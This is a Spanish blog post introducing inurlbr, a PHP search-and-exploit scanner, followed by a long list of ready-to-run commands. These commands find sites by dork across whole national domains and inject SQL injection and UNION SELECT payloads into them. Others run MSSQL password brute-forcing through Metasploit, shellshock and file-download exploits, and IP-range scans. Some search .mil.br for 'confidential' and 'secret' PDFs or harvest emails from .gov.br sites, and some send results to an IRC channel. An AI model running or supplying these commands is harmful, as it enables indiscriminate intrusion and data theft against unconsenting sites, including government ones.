inurlbr: motor de búsqueda avanzado para pentests

inurlbr es una herramienta en PHP que nos servirá como motor de búsqueda avanzado para la fase inicial de descubrimiento de un pentest o en un análisis de vulnerabilidades. Puede usar hasta 24 motores de búsqueda y 6 opciones especiales o deep web.

Esta herramienta permite aprovechar el poder de la información que ya está indexada por los motores de búsqueda y analizar un objetivo para cualquier posible intrusión.

Es capaz de extraer direcciones de correo electrónicos y URLs y valida cada petición examinando las respuestas HTTP. También soporta Tor para aleatorizar la IP y comandos externos para explotación: por ejemplo si encontramos una vulnerabilidad de inyección SQL, podríamos usar
inurlbr para lanzar directamente sqlmap o cualquier otra herramienta a nuestra elección.

inurlbr funciona con la versión version **5.4.x** de [php](http://php.net/downloads.php) en plataformas linux.


Para instalarlo podemos clonar el repositorio:  
git clone https://github.com/googleinurl/SCANNER-INURLBR.git inurlbr

Dar permisos de ejecución al script:
chmod +x inurlbr.php

E instalar las dependencias necesarias:
apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl


También es recomendable instalar tor:
apt-get install tor (https://www.torproject.org/docs/debian.html.en)

Permite un montón de parámetros por lo que te recomendamos que le eches un vistazo tranquilamente para ver todas las posibilidades:
./inurlbr.php --help | more



Para que os hagáis una idea y veáis un ejemplo de su uso, con el siguiente comando buscaremos sitios php que usen el parámetro id (dork 'inurl:php?id=') e inyectará en cada petición GET un pequeño payload (?´'%270x27;) para comprobar si es vulnerable a sql injection:

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  

Por último os dejo con más y alucinantes ejemplos ... ¡que debéis usar con responsabilidad!:

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'        

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

./inurlbr.php --dork 'new.php?id=' -s teste.txt  --exploit-get ?´0x27  --command-vul 'nmap sV -p 22,80,21 _TARGET_'

./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'

./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'

./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id  1,2,6  

./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent  'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' 

./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id  1,2,6 

./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id  1,2,6  --irc 'irc.rizon.net#inurlbrasil'   

./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'  

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'  

./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'  

./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8  

./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8   --pr

./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock

./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8  --sub-file 'xpls_Arbitrary_File_Download.txt'  

Referencias:
- Fuente: http://www.darknet.org.uk/2016/04/inurlbr-advanced-search-engine-tool/
- Proyecto: https://github.com/googleinurl/SCANNER-INURLBR
- Demos: http://youtube.com/c/INURLBrasil
- Tutoriais: http://blog.inurl.com.br/search/label/INURLBR
- IRC: irc.rizon.net / #inurlbrasil

Comentarios